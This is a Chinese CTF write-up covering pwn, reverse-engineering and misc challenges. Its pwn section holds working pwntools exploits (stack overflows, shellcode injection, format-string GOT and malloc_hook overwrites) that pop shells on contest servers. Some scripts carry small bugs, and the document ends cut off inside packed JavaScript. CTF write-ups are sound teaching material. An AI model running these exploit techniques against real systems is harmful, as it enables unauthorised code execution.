【WriteUp】2020第五届融思杯

PWN

CTFer

Description


保护:

[*] '/root/CTF/Pwn/RSCTF/pwn1'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

源码:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [rsp+0h] [rbp-70h]

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("Welcome to RSCTF");
  puts("A secret make a CTFer CTFer");
  read(0, &buf, 0x90uLL);
  return 0;
}

target:

int target()
{
  puts("QWQ");
  return system("/bin/sh");
}

Solution


直接ret2txt,返回到后门函数

Exp


#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

p = remote('192.168.1.115',28327)
addr_sys = 0x400696
pd = 'A' * (0x70+8) + p64(addr_sys)
p.sendline(pd)
p.interactive()

Flag


动态flag 

SHer

Description


保护:

[*] '/root/CTF/Pwn/RSCTF/pwn2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments

源码:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [rsp+0h] [rbp-200h]

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  printf("A secret is [%#llx]\n", &buf);
  puts("Please make buf executable");
  read(0, &buf, 0x210uLL);
  return 0;
}

target

int target()
{
  puts("QWQ");
  return system("/bin/sh");
}

Solution


题目本意考的是在buf处写入shellcode,返回到buf段执行

但是有个非预期,有后门函数,直接ret2txt,返回到后门函数

Exp


# -*- coding:utf-8 -*-
from pwn import *
context(arch = 'amd64',endian = 'el',os = 'linux')
context.log_level = 'debug'
p = process('./pwn2')

shellcode = asm(shellcraft.amd64.sh())
p.recvuntil("A secret is [")
addr_buf = int(a.recvuntil("\n")[:-2],16)

pd = shellcode 
pd = shellcode.ljust(0x208,'a')
pd += p64(addr_buf)

p.sendafter('executable\n',pd)
p.interactive() 

Flag


动态flag

localover

Description


保护:

[*] '/root/CTF/Pwn/RSCTF/pwn3'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

源码:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  frame f; // [rsp+10h] [rbp-90h]

  memset(&f, 0, 0x88uLL);
  printf(":>", 0LL, argv);
  fflush(_bss_start);
  read(0, &f, 0x100uLL);
  printf("x = %lx\n", f.x);
  if ( f.x == -4990306499233399057LL )
  {
    puts("launching shell...");
    system("/bin/sh");
  }
  return 0;
}

Solution


溢出到结构体的f.x,题目很友好,没有去符号化,ida里可以直接看到结构体的偏移为0x80

但是有个非预期,有后门函数,可以直接返回到后门函数

Exp


#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

context(log_level="debug", arch="amd64", os="linux")
debug = 2
if debug == 1:
    p = process("./pwn3")
else:
    p = remote("183.220.1.118",17254)
elf = ELF("./pwn3",checksec=False)

#gdb.attach(p,'b *0x400710\nc')
target = 0xBABEDEADC0DEBEEF
addr_sys = 0x400732 

pd = 'a'*0x98 + p64(addr_sys) #预期解 pd = 'a'*0x80 + p64(target)
p.sendafter('>',pd)

p.interactive()

Flag


动态flag

assqww

Description


保护:

[*] '/root/CTF/Pwn/RSCTF/assqww'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

源码:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  signed int v3; // eax
  signed int v5; // [rsp+Ch] [rbp-4h]

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("Toddler's Secure Login System 1.0 beta.");
  v5 = 2;
  while ( 1 )
  {
    v3 = v5--;
    if ( !v3 )
      break;
    welcome();
    login();
  }
  puts("Now I can safely trust you that you have credential :)");
  sleep(0xAu);
  return 0;
}

welcome:

unsigned __int64 welcome()
{
  char format; // [rsp+0h] [rbp-110h]
  unsigned __int64 v2; // [rsp+108h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  buffinit(&format, 248LL);
  printf("enter you name : ", 248LL);
  __isoc99_scanf((__int64)"%256s");
  printf("Welcome ", &format);
  printf(&format);
  putchar(10);
  return __readfsqword(0x28u) ^ v2;
}

login:

unsigned __int64 login()
{
  __int64 v1; // [rsp+0h] [rbp-50h]
  __int64 v2; // [rsp+8h] [rbp-48h]
  char format[8]; // [rsp+10h] [rbp-40h]
  __int64 v4; // [rsp+28h] [rbp-28h]
  __int64 v5; // [rsp+30h] [rbp-20h]
  __int64 v6; // [rsp+38h] [rbp-18h]
  __int64 v7; // [rsp+40h] [rbp-10h]
  unsigned __int64 v8; // [rsp+48h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  strcpy(format, "enter passcode1 :");
  v4 = 0LL;
  v5 = 0LL;
  v6 = 0LL;
  v7 = 0LL;
  printf(format);
  __isoc99_scanf((__int64)"%ld");
  fflush(stdin);
  printf("enter passcode2 : ", v1);
  puts("checking...");
  if ( v1 != 0x528E6 || v2 != 0xCC07C9 )
  {
    puts("Login Failed!");
  }
  else
  {
    puts("Login OK!");
    flag();
    puts("Login OK!");
  }
  return __readfsqword(0x28u) ^ v8;
}

flag:

int flag()
{
  return system("/bin/sh");
}

Solution1


脑淤血格式化字符串,题目一开始开了PIE保护,

想到按照题目意思把V1[$rbp-0x50]V2[$rbp-0x48]改成0x528E60xCC07C9,v1和v2也在栈里,

可以输四次格式化字符串,常规改栈

p.sendlineafter('name : ', '%47$p')
p.recvuntil('Welcome ')

addr_leak = int(p.recv(14), 16)
addr_v1 = addr_leak - 0x158
addr_v2 = addr_leak - 0x150

pd = '%' + str(addr_v1 & 0xffff) + 'c%47$hn'  #v1
pd += '%' + str((addr_v2 & 0xffff)-(addr_v1 & 0xffff)) + 'c%62$hn' #v2
p.sendlineafter('enter passcode1 :', pd)

pd = '%' + str(target1) + 'c%13$n' #v1
pd += '%' + str(target2-target1) + 'c%73$n' #v2
p.sendlineafter('name : ', pd)

调试发现第二次栈地址怎么都改不掉,暂时没发现原因,

换一种做法,尝试把libc_start_main改成one_gadgets直接提权

调试了两天,均告失败,审计了一下源码,发现了这个

 __isoc99_scanf((__int64)"%ld");

scanf只允许输入一个长整型的数,人都傻了,

vmmap看一下权限

pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
          0x400000           0x401000 r-xp     1000 0      /root/CTF/Pwn/RSCTF/assqww
          0x600000           0x601000 r--p     1000 0      /root/CTF/Pwn/RSCTF/assqww
          0x601000           0x602000 rw-p     1000 1000   /root/CTF/Pwn/RSCTF/assqww
    0x7ffff7a0d000     0x7ffff7bcd000 r-xp   1c0000 0      /lib/x86_64-linux-gnu/libc-2.23.so
    0x7ffff7bcd000     0x7ffff7dcd000 ---p   200000 1c0000 /lib/x86_64-linux-gnu/libc-2.23.so
    0x7ffff7dcd000     0x7ffff7dd1000 r--p     4000 1c0000 /lib/x86_64-linux-gnu/libc-2.23.so
    0x7ffff7dd1000     0x7ffff7dd3000 rw-p     2000 1c4000 /lib/x86_64-linux-gnu/libc-2.23.so
    0x7ffff7dd3000     0x7ffff7dd7000 rw-p     4000 0      
    0x7ffff7dd7000     0x7ffff7dfd000 r-xp    26000 0      /lib/x86_64-linux-gnu/ld-2.23.so
    0x7ffff7dd7000     0x7ffff7dfd000 rwxp    26000 0      <explored>
    0x7ffff7fce000     0x7ffff7fd1000 rw-p     3000 0      
    0x7ffff7ff7000     0x7ffff7ffa000 r--p     3000 0      [vvar]
    0x7ffff7ffa000     0x7ffff7ffc000 r-xp     2000 0      [vdso]
    0x7ffff7ffc000     0x7ffff7ffd000 r--p     1000 25000  /lib/x86_64-linux-gnu/ld-2.23.so
    0x7ffff7ffd000     0x7ffff7ffe000 rw-p     1000 26000  /lib/x86_64-linux-gnu/ld-2.23.so
    0x7ffff7ffe000     0x7ffff7fff000 rw-p     1000 0      
    0x7ffffffde000     0x7ffffffff000 rw-p    21000 0      [stack]
0xffffffffff600000 0xffffffffff601000 r-xp     1000 0      [vsyscall]

got表可以改!!!!!但是开了PIE保护,拿啥改呢,one_gadgets好像可以,但是题目提供了一个shell函数

百度了一下,和pwnable.kr的passcode这题很像,但是本题开了PIE,又去重新下了个附件

发现PIE保护没了,

到此,这题就思路就明了,格式化字符串把printf函数改成system就结束了

Exp1


#-*-coding:utf-8 -*-
from pwn import *

context(arch = 'amd64',endian = 'el',os = 'linux')
context.log_level = 'debug'
debug = 1
if debug == 1:
    p = process("./assqww")
else:
    p = remote("183.220.1.118",16708)

elf = ELF("./assqww",checksec=False)

addr_sys = 0x400AE2
got_printf = elf.got['printf']

pd = fmtstr_payload(6,{got_printf:addr_sys})
p.recvuntil("name : ")
p.sendline(pd)

p.interactive()

Solution2


binlep师傅提供的思路,scanf输入超过0x400会申请堆块,把__malloc_hook改了直接提权

Exp2


#!/usr/bin/env python
# -*- coding: utf-8 -*-can
from pwn import *
debug = 2
context(arch='amd64', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
  p = process(['./chall'])
else:
  p = remote('183.220.1.118', 18052)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False) 
elf = ELF('./chall', checksec=False)

pd = '%45$p'
p.sendlineafter('name : ', pd)
p.recvuntil('Welcome ')

libc.address = int(p.recv(14), 16) - libc.sym['__libc_start_main'] - 240 one = libc.address + 0xf1207

p.sendlineafter('passcode1 :', '1')
# gdb.attach(p, 'brva 0xa96\nbrva 0x97A\nb malloc\nc')

pd = fmtstr_payload(6, {libc.sym['__malloc_hook']:one})
p.sendlineafter(' name : ', pd)
p.sendlineafter('passcode1 :', '1' * 0x400)

p.interactive()

Flag


动态flag 

unlink

用栈考unlink,我也unlink了,去学习unlink了,之后补题解

random

Description


保护:

[*] '/root/CTF/Pwn/RSCTF/pwn6'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

源码:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // eax
  int v5; // [rsp+0h] [rbp-20h]
  int v6; // [rsp+4h] [rbp-1Ch]
  unsigned __int64 v7; // [rsp+8h] [rbp-18h]

  v7 = __readfsqword(0x28u);
  v3 = rand();
  LOWORD(v3) = 0;
  v6 = v3 | (unsigned __int16)rand();
  v5 = 0;
  __isoc99_scanf(&unk_8E8, &v5);
  if ( (v6 ^ v5) == 305419896 )
  {
    puts("Congratulations my friend!");
    system("/bin/sh");
  }
  else
  {
    puts("Wrong, maybe you  are close or not.");
  }
  return 0;
}

Solution


代码很简单,生成两个伪随机数,输入的数和V6异或等于0x12345678就给shell

直接在cmp下断点

.text:0000000000000809                 cmp     eax, 12345678h

V6存在rbp-0x1c

pwndbg> 
0x0000555555554809 in main ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────────────────────────────
 RAX  0x6b9a0051
 RBX  0x6b8b0000
 RCX  0x10
 RDX  0x7ffff7dd3790 (_IO_stdfile_0_lock) ◂— 0x0
 RDI  0x7fffffffd910 ◂— 0x33323233323131 /* '1123223' */
 RSI  0x1
 R8   0x0
 R9   0x0
 R10  0x0
 R11  0x7ffff7b846a0 (_nl_C_LC_CTYPE_class+256) ◂— add    al, byte ptr [rax]
 R12  0x5555555546a0 (_start) ◂— xor    ebp, ebp
 R13  0x7fffffffdf30 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffde50 —▸ 0x555555554860 (__libc_csu_init) ◂— push   r15
 RSP  0x7fffffffde30 ◂— 0x6b8b23c600112397
 RIP  0x555555554809 (main+95) ◂— cmp    eax, 0x12345678
────────────────────────────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────────────────────────
   0x5555555547f2 <main+72>     lea    rdi, [rip + 0xef]
   0x5555555547f9 <main+79>     mov    eax, 0
   0x5555555547fe <main+84>     call   __isoc99_scanf@plt <0x555555554670>

   0x555555554803 <main+89>     mov    eax, dword ptr [rbp - 0x20]
   0x555555554806 <main+92>     xor    eax, dword ptr [rbp - 0x1c]
 ► 0x555555554809 <main+95>     cmp    eax, 0x12345678
   0x55555555480e <main+100>    jne    main+138 <0x555555554834>
    ↓
   0x555555554834 <main+138>    lea    rdi, [rip + 0xd5]
   0x55555555483b <main+145>    call   puts@plt <0x555555554640>

   0x555555554840 <main+150>    mov    eax, 0
   0x555555554845 <main+155>    mov    rdx, qword ptr [rbp - 0x18]
────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────
00:0000│ rsp  0x7fffffffde30 ◂— 0x6b8b23c600112397
01:0008│      0x7fffffffde38 ◂— 0xf316eb1d17b95600
02:0010│      0x7fffffffde40 —▸ 0x7fffffffdf30 ◂— 0x1
03:0018│      0x7fffffffde48 ◂— 0x0
04:0020│ rbp  0x7fffffffde50 —▸ 0x555555554860 (__libc_csu_init) ◂— push   r15
05:0028│      0x7fffffffde58 —▸ 0x7ffff7a2d840 (__libc_start_main+240) ◂— mov    edi, eax
06:0030│      0x7fffffffde60 ◂— 0x1
07:0038│      0x7fffffffde68 —▸ 0x7fffffffdf38 —▸ 0x7fffffffe2e2 ◂— '/root/CTF/Pwn/RSCTF/pwn6'
──────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────
 ► f 0     555555554809 main+95
   f 1     7ffff7a2d840 __libc_start_main+240
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/wx $rbp-0x1c
0x7fffffffde34: 0x6b8b23c6

V6 = 0x6b8b23c6

那么V6与0x12345678异或就可以算出V5了

Exp


#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 2
context(arch='amd64', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
    p = process('./pwn6')
else:
    p = remote('183.220.1.118',14379)

#gdb.attach(p ,'b random\nc')
rand_ = 0x6b8b23c6
pd = rand_ ^ 0x12345678
p.sendline(str(pd))

p.interactive()

Flag


动态flag 

RE

RE1

Solution


直接ida,shift+f12,ctrl+f搜索flag

Flag


flag{this_ls_flag}

RE2

Description


源码:

int sub_401080()
{
  unsigned int v0; // eax
  int v1; // esi
  char v2; // ST0C_1
  signed int v3; // esi
  int v5; // [esp+4h] [ebp-2Ch]
  int v6; // [esp+8h] [ebp-28h]
  int v7; // [esp+Ch] [ebp-24h]
  int v8; // [esp+10h] [ebp-20h]
  int v9; // [esp+14h] [ebp-1Ch]
  int v10; // [esp+18h] [ebp-18h]
  int v11; // [esp+1Ch] [ebp-14h]
  int v12; // [esp+20h] [ebp-10h]
  int v13; // [esp+24h] [ebp-Ch]
  char v14; // [esp+28h] [ebp-8h]

  v0 = time64(0);
  srand(v0);
  v1 = 10000 * rand() / 0x8000 + 1;
  ((void (__cdecl *)(const char *, char))sub_401020)("please input a number:", v2);
  sub_401050("%d", (unsigned int)&v5);
  if ( v1 == v5 )
  {
    v6 = 611328289;
    v3 = 0;
    v7 = 695562785;
    v8 = 639791648;
    v9 = 578037106;
    v10 = 695476265;
    v11 = 1931487008;
    v12 = 656831779;
    v13 = 690233379;
    v14 = 0;
    do
      sub_401020((const char *)&unk_402118, *((_BYTE *)&v6 + v3++) ^ 0x11);
    while ( v3 < 32 );
    sub_401020((const char *)&unk_40211C);
  }
  system("pause");
  return 0;
}

Solution


八个int类型的整数与0x11进行异或,把每个整数转成4个两位十六进制数,由低位到高位分别于0x11异或,结果转成字符即可

Exp


list = [0x21,0x21,0x70,0x24,
        0x21,0x72,0x75,0x29,
        0x20,0x72,0x22,0x26,
        0x72,0x25,0x74,0x22,
        0x29,0x20,0x74,0x29,
        0x20,0x27,0x20,0x73,
        0x23,0x75,0x26,0x27,
        0x23,0x20,0x24,0x29,]

flag = ''
for i in range(32):
    flag += chr(list[i]^0x11)
print 'flag{' + ''.join(flag) + '}'

Flag


flag{00a50cd81c37c4e381e8161b2d762158}

RE3

Description


源码:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int i; // [rsp+Ch] [rbp-444h]
  char arr[33]; // [rsp+10h] [rbp-440h]
  char input[1024]; // [rsp+40h] [rbp-410h]
  unsigned __int64 v7; // [rsp+448h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  strcpy(arr, "f5bd0a6c0].`0[Z+)[./,ZWV)'#$$$%T");
  memset(input, 0, sizeof(input));
  printf("input flag:", argv, input);
  if ( ptrace(0, 0LL) < 0 )
  {
    printf("no!");
    exit(0);
  }
  __isoc99_scanf("%s", input);
  for ( i = 0; i <= 31; ++i )
    input[i] -= i / 2;
  if ( !strcmp(arr, input) )
    printf("yes", input);
  else
    printf("no", input);
  putchar(10);
  return 0;
}

Solution


关键点

 for ( i = 0; i <= 31; ++i )
    input[i] -= i / 2;

反着写脚本就行

Exp


str_ ="f5bd0a6c0].`0[Z+)[./,ZWV)'#$$$%T"
flag = ''
for i in range(32):
    flag += chr(ord(str_[i])+i/2)

print 'flag{' + ''.join(flag) + '}'

Flag


flag{f5ce2c9f4a3e6aa21c786dba5301224c}

RE4

RC4加密,赛后复现一下

Description


源码:

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  __int64 v3; // rbp
  const char *v4; // rbx
  __int64 v6; // [rsp+0h] [rbp-8F8h]
  char v7; // [rsp+8h] [rbp-8F0h]
  char s2[8]; // [rsp+100h] [rbp-7F8h]
  char v9; // [rsp+148h] [rbp-7B0h]
  char s; // [rsp+4F0h] [rbp-408h]
  unsigned __int64 v11; // [rsp+8D8h] [rbp-20h]

  v11 = __readfsqword(0x28u);
  strcpy(s2, "AC6297BD8C53021894A5EADEA1FD9E8A0F0C7845A199FF1C0D8F970DB02B6802");
  memset(&v9, 0, 0x3A0uLL);
  memset(&s, 0, 0x3E8uLL);
  std::__ostream_insert<char,std::char_traits<char>>(&std::cout, "input flag:", 11LL);
  std::endl<char,std::char_traits<char>>(&std::cout);
  std::operator>><char,std::char_traits<char>>(&std::cin, &s);
  v6 = 111482039922277LL;
  memset(&v7, 0, 0xF8uLL);
  if ( strlen(&s) != 32 )
  {
    std::__ostream_insert<char,std::char_traits<char>>(&std::cout, "no", 2LL);
    std::endl<char,std::char_traits<char>>(&std::cout);
    exit(0);
  }
  v3 = sub_400DE0(&s, (char *)&v6);
  v4 = (const char *)operator new[](0x40uLL);
  sub_400CE0(v3, v4);
  if ( !strcmp(v4, s2) )
    std::__ostream_insert<char,std::char_traits<char>>(&std::cout, "yes", 3LL);
  else
    std::__ostream_insert<char,std::char_traits<char>>(&std::cout, "no", 2LL);
  std::endl<char,std::char_traits<char>>(&std::cout);
  return 0LL;
}

sub_400DE0:

__int64 __fastcall sub_400CE0(const char *a1, __int64 a2)
{
  const char *v2; // rbx
  __int64 result; // rax
  unsigned __int64 v4; // rdi
  int v5; // edx
  int v6; // ecx
  int v7; // ecx
  char v8; // r9
  int v9; // edx
  char v10; // r8
  bool v11; // cc
  char v12; // cl
  char v13; // dl

  v2 = a1;
  result = (int)strlen(a1);
  if ( (_DWORD)result )
  {
    v4 = 0LL;
    do
    {
      v5 = v2[v4];
      if ( v2[v4] < 0 )
        v5 = 128 - v5;
      v6 = v5 + 15;
      if ( v5 >= 0 )
        v6 = v5;
      v7 = v6 >> 4;
      v8 = v7 + 55;
      v9 = v5 % 16;
      v10 = v7 + 48;
      v11 = v7 < 10;
      v12 = v9 + 48;
      if ( !v11 )
        v10 = v8;
      v11 = v9 < 10;
      *(_BYTE *)(a2 + 2 * v4) = v10;
      v13 = v9 + 55;
      if ( v11 )
        v13 = v12;
      *(_BYTE *)(a2 + 2 * v4++ + 1) = v13;
    }
    while ( v4 < (int)result );
  }
  return result;
}

sub_400CE0:

__int64 __fastcall sub_400CE0(const char *a1, __int64 a2)
{
  const char *v2; // rbx
  __int64 result; // rax
  unsigned __int64 v4; // rdi
  int v5; // edx
  int v6; // ecx
  int v7; // ecx
  char v8; // r9
  int v9; // edx
  char v10; // r8
  bool v11; // cc
  char v12; // cl
  char v13; // dl

  v2 = a1;
  result = (int)strlen(a1);
  if ( (_DWORD)result )
  {
    v4 = 0LL;
    do
    {
      v5 = v2[v4];
      if ( v2[v4] < 0 )
        v5 = 128 - v5;
      v6 = v5 + 15;
      if ( v5 >= 0 )
        v6 = v5;
      v7 = v6 >> 4;
      v8 = v7 + 55;
      v9 = v5 % 16;
      v10 = v7 + 48;
      v11 = v7 < 10;
      v12 = v9 + 48;
      if ( !v11 )
        v10 = v8;
      v11 = v9 < 10;
      *(_BYTE *)(a2 + 2 * v4) = v10;
      v13 = v9 + 55;
      if ( v11 )
        v13 = v12;
      *(_BYTE *)(a2 + 2 * v4++ + 1) = v13;
    }
    while ( v4 < (int)result );
  }
  return result;
}

Solution


比正常RC4多了一道加密

Exp


用c语言转成正常加密的RC4

#include <stdio.h>

int main(){
    long long result; // rax 
    unsigned long long i; // rdi 
    char j;
    int tmp; // edx
    int t2; // ecx
    int t7; // ecx 
    char v8; // r9 
    int v9; // edx 
    char v10; // r8 
    int v11; // cc 
    char v12; // cl
    char v13; // dl
    char a[0x30] = {0};
    char res[] = 
    "AC6297BD8C53021894A5EADEA1FD9E8A0F0C7845A199FF1C0D8F970DB02B6802";
    result = 0x20;  
    if(result){
        i = 0LL;  
        do{
            for(j = 0; j <= 0xff; ++j){
                tmp = j;
                if(j < 0)
                    tmp = 0x80 - tmp;
                t2 = tmp + 15;
                if(tmp >= 0)
                    t2 = tmp;
                t7 = t2 >> 4;
                v8 = t7 + 0x37;
                v9 = tmp % 16;
                v10 = t7 + 0x30;
                v11 = t7 < 10;
                v12 = v9 + 0x30;
                if(!v11)
                    v10 = v8;
                v11 = v9 < 0xA;
                if(res[2 * i] != v10){
                    continue;
                }
                v13 = v9 + 0x37;
                if(v11)
                    v13 = v12;
                if(res[2 * i + 1] == v13){
                    a[i] = j;
                    printf("%02hhx", j);  i++;
                    break;
                }
            }
        } while(i < result); 
    }
    return 0;
}           

输出的值用RC4解密

from Crypto.Cipher import ARC4
import binascii

key = 'encode'
rc4 = ARC4.new(key)
res = rc4.decrypt(binascii.unhexlify("d462e9c3f4530218ecdb96a2df83e2f60f0c7845dfe7811c0df1e90dd02b6802"))

print(res)

Flag


flag{374315ed9864f687d6d5144167944eb8}

RE5

Description


main:

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  __int64 v3; // rdx
  __int64 v5; // [rsp+0h] [rbp-868h]
  __int64 v6; // [rsp+8h] [rbp-860h]
  __int64 v7; // [rsp+10h] [rbp-858h]
  __int64 v8; // [rsp+18h] [rbp-850h]
  __int64 v9; // [rsp+20h] [rbp-848h]
  __int64 v10; // [rsp+28h] [rbp-840h]
  __int16 v11; // [rsp+30h] [rbp-838h]
  char v12; // [rsp+40h] [rbp-828h]
  char s2; // [rsp+440h] [rbp-428h]
  unsigned __int64 v14; // [rsp+848h] [rbp-20h]

  v14 = __readfsqword(0x28u);
  v5 = 3481656678373807183LL;
  v10 = 4801626LL;
  v6 = 8595494054362705230LL;
  v7 = 7662428752547304538LL;
  v8 = 3774936019637192525LL;
  v9 = 3626860387272120153LL;
  v11 = 0;
  memset(&v12, 0, 0x400uLL);
  memset(&s2, 0, 0x400uLL);
  __printf_chk(1LL, "input flag:", a3);
  if ( ptrace(PTRACE_TRACEME, 0LL) < 0 )
  {
    __printf_chk(1LL, "no!", v3);
    exit(0);
  }
  __isoc99_scanf("%s", &v12);
  BYTE3(v10) = 61;
  sub_4008D0(&v12, strlen(&v12), &s2, 0LL);
  if ( !strcmp((const char *)&v5, &s2) )
    puts("yes");
  else
    puts("no");
  return 0LL;
}

sub_4008D0:

__int64 __fastcall sub_4008D0(char *a1, int a2, _BYTE *a3, int *a4)
{
  _BYTE *v4; // r8
  int v5; // er11
  int v6; // esi
  int i; // er9
  char v8; // al
  char v10; // al

  if ( !a1 || !a2 )
    return 0xFFFFFFFFLL;
  v4 = a3;
  v5 = 0;
  if ( a2 % 3 )
    v5 = 3 - a2 % 3;
  v6 = v5 + a2;
  if ( v6 > 0 )
  {
    for ( i = 0; i < v6; i += 3 )
    {
      *v4 = byte_400D40[*a1 >> 2];
      if ( i != v6 - 3 || v5 == 0 )
      {
        v4[1] = byte_400D40[((16 * *a1) & 0x30) + ((int)(unsigned __int8)a1[1] >> 4)];
        v4[2] = byte_400D40[((4 * a1[1]) & 0x3C) + ((int)(unsigned __int8)a1[2] >> 6)];
        v4[3] = byte_400D40[a1[2] & 0x3F];
      }
      else if ( v5 == 1 )
      {
        v4[1] = byte_400D40[((16 * *a1) & 0x30) + ((int)(unsigned __int8)a1[1] >> 4)];
        v10 = a1[1];
        v4[3] = 61;
        v4[2] = byte_400D40[(4 * v10) & 0x3C];
      }
      else if ( v5 == 2 )
      {
        v8 = *a1;
        v4[2] = 61;
        v4[3] = 61;
        v4[1] = byte_400D40[(16 * v8) & 0x30];
      }
      v4 += 4;
      a1 += 3;
    }
  }
  if ( a4 )
    *a4 = 8 * v6 / 0;
  return 0LL;
}

Solution


审计一下sub_4008D0函数,发现就是base64的算法

那就找一下被加密的字符串

主函数里

  v5 = 3481656678373807183LL;
  v10 = 4801626LL;
  v6 = 8595494054362705230LL;
  v7 = 7662428752547304538LL;
  v8 = 3774936019637192525LL;
  v9 = 3626860387272120153LL;

变成字符:

 v5 = '0QTMhVTO';
  v10 = 'IDZ';
  v6 = 'wITM3EmN';
  v7 = 'jVjZhRTZ';
  v8 = '4cDO4MGM';
  v9 = '2U2NiJWY';

变成字符串:

"OTVhMTQ0NmE3MTIwZTRhZjVjMGM4ODc4YWJiN2U2ZDI"

直接base64解密即可

Exp


import base64

str_enc = 'OTVhMTQ0NmE3MTIwZTRhZjVjMGM4ODc4YWJiN2U2ZDI=='
flag = base64.b64decode(str_enc)
print 'flag{' + ''.join(flag) + '}'

Flag


flag{95a1446a7120e4af5c0c8878abb7e6d2}

RE6

Description


源码:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  signed int v3; // esi
  int v4; // ST2C_4
  int v6; // [esp+4h] [ebp-34h]
  int v7; // [esp+8h] [ebp-30h]
  int v8; // [esp+Ch] [ebp-2Ch]
  int v9; // [esp+10h] [ebp-28h]
  int v10; // [esp+14h] [ebp-24h]
  int v11; // [esp+18h] [ebp-20h]
  int v12; // [esp+1Ch] [ebp-1Ch]
  int v13; // [esp+20h] [ebp-18h]
  int v14; // [esp+24h] [ebp-14h]
  int v15; // [esp+28h] [ebp-10h]
  int v16; // [esp+2Ch] [ebp-Ch]
  char v17; // [esp+30h] [ebp-8h]

  sub_401020("----------calculator---------\n");
  sub_401020("1.ADD\n");
  sub_401020("2.SUB\n");
  sub_401020("3.MUL\n");
  sub_401020("4.DIV\n");
  sub_401020("Select a algorithm from the list:");
  sub_401050("%d", &v6);
  sub_401020("input two number:");
  sub_401050("%d %d", &v7, &v8);
  if ( v6 > 42330 )
  {
    sub_401020("error!");
  }
  else if ( v6 == 42330 )
  {
    v9 = 1731342645;
    v10 = 1684222819;
    v11 = 828728675;
    v12 = 1647718455;
    v13 = 878853937;
    v14 = 842022710;
    v15 = 1664169269;
    v16 = 1043686709;
    v17 = 0;
    if ( v8 + v7 == 6 )
    {
      v3 = 0;
      do
      {
        v4 = *((unsigned __int8 *)&v9 + v3) ^ 6;
        sub_401020(&unk_402108);
        ++v3;
      }
      while ( v3 < 32 );
      sub_401020(&unk_40210C);
    }
  }
  else
  {
    switch ( v6 )
    {
      case 1:
        sub_401020("%d+%d=%d\n");
        break;
      case 2:
        sub_401020("%d-%d=%d\n");
        break;
      case 3:
        sub_401020("%d*%d=%d\n");
        break;
      case 4:
        sub_401020("%d/%d=%d\n");
        break;
    }
  }
  system("pause");
  return 0;
}

Solution


审计代码,输入42330,然后输俩数相加等于6

Flag


flag{374ae5ebecc7160d79d20964337e3c38}

MISC

好可爱的加密

Solution


颜文字,浏览器控制台直接执行js代码即可

Flag


flag{this_is_aaencode}

小姐姐

Solution


拖入winhex ,搜索flag即可

Flag


flag{xjj_haokanma}

奇怪的码

Solution


用ps把三个角的定位符补齐,扫码即可

Flag


flag{this_is_a_qrcode}

神秘文件

Solution


流量包分析,发现一个html格式的hehe导出http,打开发现提示: '听说密码藏在源代码中

js代码:

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('B 1c=L J("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");B U=L J("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f","{","}");B 1w=L J(0,1x,1y,1z,1A,1B,1C,1E,1G,1L,1M,1N,1O,1d,1e,1f,V);B 1R=L J(0,1,3,7,15,W,1h,1i,Z,1j,1k,1l,1m,1n,1o,1p,V);B R=L J(15,1q,10,16,3,12,3,2,11,1,12,15,6,6,12,7,0,10,14,2,1,7,8,15,13,4,1,7,15,13,0,5,1,11,3,11);B f=[];P(i=0;i<R.D;i++){f.1r(1c[R[i]])}f.18(4,0,U[16]);f.18(1s,0,U[17]);19(f.1t(\'\'),1u);1v 19(Q,O){B A="";P(B i=0;i<O.D;i++){A+=O.X(i).G()}B E=F.Y(A.D/5);B 